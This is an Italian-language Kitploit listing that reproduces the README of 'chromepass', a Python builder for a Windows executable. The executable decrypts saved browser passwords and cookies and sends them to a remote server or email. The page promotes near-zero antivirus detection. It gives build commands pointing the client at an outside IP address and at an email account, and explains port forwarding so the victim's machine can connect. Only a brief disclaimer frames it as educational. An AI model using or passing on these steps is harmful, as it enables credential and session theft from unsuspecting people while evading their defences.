Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
chromepass — Chromepass - Hacking delle password salvate di Chrome | Kitploit
Strumenti/GitHubGitHub/darkarp/chromepass
Password CrackingEsfiltrazione DatiPhishingRed Teaming
GitHubdarkarp/chromepass

chromepass

Chromepass - Hacking delle password salvate di Chrome

Vedi Repository
8381114 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Chromepass - Hacking delle password e dei cookie salvati di Chrome

Rilascio Stato build su CircleCI
Qualità del codice Scrutinizer (GitHub/Bitbucket)
Problemi GitHub Problemi chiusi GitHub

Vedi Demo · Segnala un bug · Richiedi una funzione

Indice dei contenuti

  • Informazioni sul progetto
    • Rilevamento antivirus
  • Guida introduttiva
    • Dipendenze e requisiti
    • Installazione
  • Utilizzo
  • Email
  • Errori, bug e richieste di funzionalità
  • Scopri di più
  • Licenza
  • Demo

Informazioni sul progetto

Chromepass è un'applicazione console basata su Python che genera un eseguibile Windows con le seguenti funzionalità:

  • Decripta le password e i cookie salvati di Google Chrome, Chromium, Edge, Brave, Opera e Vivaldi
  • Invia un file con le combinazioni login/password e i cookie da remoto (server http o email)
  • Non rilevabile dagli antivirus se eseguito correttamente
  • Icona personalizzata
  • Messaggio di errore personalizzato
  • Personalizza porta

Rilevamento antivirus!

La nuova metodologia di creazione del client garantisce praticamente un tasso di rilevamento dello 0%, anche senza tattiche di evasione antivirus. Se in futuro ciò non dovesse più essere vero, verranno implementati alcuni metodi per migliorare l'evasione antivirus.

Un esempio delle ultime scansioni (nota: nell'arco di 10-12 ore si passa da 0-2 rilevamenti a 32 rilevamenti, quindi esegui l'analisi sulle tue build):

  • Scansione VirusTotal 1
  • Scansione VirusTotal 2
  • Scansione VirusTotal 3
  • Scansione VirusTotal 4

Guida introduttiva

Dipendenze e requisiti

Questa è un'applicazione molto semplice che utilizza solo:

  • Python - Testato su Python 3.9+

Si consiglia di eseguire l'installazione all'interno di una VM Windows. Alcune parti della procedura di installazione potrebbero essere influenzate da configurazioni esistenti. Questo è stato testato su una VM Windows 10 pulita.

Installazione

Chromepass richiede Windows per la compilazione! Il supporto per Linux e macOS potrebbe essere aggiunto in futuro.

Clona il repository:

root@kitploit:~
git clone https://github.com/darkarp/chromepass

Nota: In alternativa alla clonazione del repository, è possibile scaricare l'ultima release, poiché il repository potrebbe essere più soggetto a bug.

Installa le dipendenze:

Le dipendenze vengono controllate e installate automaticamente, quindi puoi passare direttamente a Utilizzo. Si consiglia di utilizzare una VM pulita, per assicurarsi che non ci siano conflitti.

Se non hai le dipendenze e la tua connessione internet non è veloce, ci vorrà un po'. Prenditi un caffè.


Utilizzo

Chromepass è molto semplice. Inizia eseguendo:

root@kitploit:~
python create.py -h

Apparirà un elenco di opzioni, autoesplicative.

Eseguire senza parametri creerà il server e il client che si connette a 127.0.0.1.

Un semplice esempio di build:

root@kitploit:~
python create.py --ip 92.34.11.220 --error --message 'An Error has happened'

Dopo aver creato il server e il client, assicurati che il server sia in esecuzione quando il client viene avviato.

I cookie e le password verranno salvati in file json in una nuova cartella chiamata data nella stessa directory del server, separati per indirizzo IP.


Email

Chromepass supporta l'invio dei file via email, anche se è ancora sperimentale. Per abilitarlo, puoi usare il flag --email durante la creazione del server. Ti serviranno due cose: un nome utente (la tua email) e una password (una password dell'app).

Per generare una password dell'app, devi andare nelle impostazioni dell'account -> Sicurezza e abilitare l'autenticazione a due fattori (obbligatoria!)

Dopo aver abilitato l'autenticazione a due fattori, vedrai una nuova opzione chiamata App Passwords: 2-step-authentication

Fai clic lì, scegli le opzioni appropriate e genera una password: 2-step-authentication

Dopo aver cliccato su Genera, ti verrà fornita la password necessaria. Puoi usare nome utente e password direttamente nel comando o semplicemente inserirli nel file config.ini, dove sono indicati YOUR_USERNAME e YOUR_PASSWORD.

Esempio con credenziali nel comando

root@kitploit:~
python create.py --error --message 'An Error has happened' --email --username [email protected] --password qwertyuiopasdfghh

Se inserisci le credenziali nel file config (vedrai dove se apri questo file)

root@kitploit:~
python create.py --error --message 'An Error has happened' --email

Note remote

Se desideri utilizzarlo in uno scenario remoto, devi anche eseguire il port forwarding (porta 80 di default), in modo che quando la vittima esegue il client possa connettersi al server sulla porta corretta.
Per informazioni più generali, clicca qui. Se non sei ancora soddisfatto, esegui una ricerca su Google.


Installazione manuale delle dipendenze

La configurazione automatica è sperimentale. Per un motivo o per un altro, la configurazione potrebbe non installare correttamente le dipendenze. In tal caso, devi installarle manualmente.
Fortunatamente ci sono solo 2 dipendenze:

  • Microsoft Visual C++ Build Tools (installa con i carichi di lavoro consigliati)
  • Rustup

Invece degli strumenti di compilazione, puoi anche installare Visual Studio, ma occuperà più spazio.

Dopo aver installato correttamente gli strumenti di compilazione, puoi semplicemente eseguire rustup-init.exe dal sito web di Rustup.

Questo completa le dipendenze necessarie e dovresti essere pronto.


Errori, bug e richieste di funzionalità

Se trovi un errore o un bug, segnalalo come issue. Se desideri suggerire una funzionalità o un miglioramento, segnalalo nelle pagine delle issue.

Segui i modelli mostrati quando crei l'issue.


Scopri di più

Per accedere a una community piena di aspiranti esperti di sicurezza informatica, dal principiante assoluto al veterano esperto, unisciti al nostro server Discord: WhiteHat Hacking

Se desideri contattarmi, puoi farlo tramite: [email protected]


Dichiarazione di non responsabilità

Non sono responsabile per ciò che fai con le informazioni e il codice forniti. Questo è inteso solo per scopi professionali o educativi.

Licenza

AGPL-3.0


Code Intelligence Status

Demo

til

Scarica lo strumento